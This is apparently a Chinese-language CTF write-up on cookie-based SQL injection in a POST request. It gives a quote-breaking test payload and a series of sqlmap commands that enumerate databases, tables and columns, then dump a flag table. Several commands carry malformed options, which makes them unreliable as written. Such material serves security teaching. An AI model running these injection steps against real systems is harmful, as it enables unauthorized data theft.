目錄
- sqlmap的POST注入
- cookie注入暴數據庫
POST注入
1.驗證存在注入
正常數據包"cookie:user=user"修改"cookie:user=admin"后都會出現flag參數

驗證Cookie: user=admin’ and ‘1’=1’報錯,回顯沒有flag,說明這種情況就存在注入

2.復制post另存為1.txt文件

>>這里是修改cookie后進行注入的,那么要結合cookie注入來看post注入的原理,其實兩個是要聯合進行注入的,互不影響。
cookie注入
所謂的POST注入是發送POST請就包進行注入,cookie注入是修改cookie信息進行偽裝身份或者說是作為一個注入點進行滲透
1.暴數據庫
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql --dbs

>>可以看到有四個數據庫
POST文件1.txt這里要寫文件位置如:/root/1.txt
cookie要寫成:--cookie="user=admin"
--string參數,用來來指定結果為true時頁面所包含的字符,不包含這個字符的都會被判斷為false:--string=“flag”表示正確時候回顯flag這個單詞
指定數據庫類型:--dbms=mysql
暴數據庫:--dbs
2.猜表
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee --tables

>>猜出employee數據庫下有三個表
對特定的數據庫進行猜表:-D 數據庫名
猜表:--tables
其它的參數不變
3.猜表fllaagg中的列
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg --columns

猜列要指定數據庫、表:-D 數據庫 -T 數據表
猜列:--columns
4.猜表中的字段
>sqlmap -r 1.txt -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg "flag" --dump

>>找到包含flag的字段
猜字段要指定數據庫、表、內容:-D 數據庫 -T 數據表 "內容"
猜字段:--dump
同樣的方法可以查看其它數據庫、表的內容,注入點方法也是一樣的,這里注入點為cookie修改數據后的數據包。如果本身POST數據包存在注入直接使用post注入,可以不用加cookie注入--cookie“user=admin”類似這樣的參數。
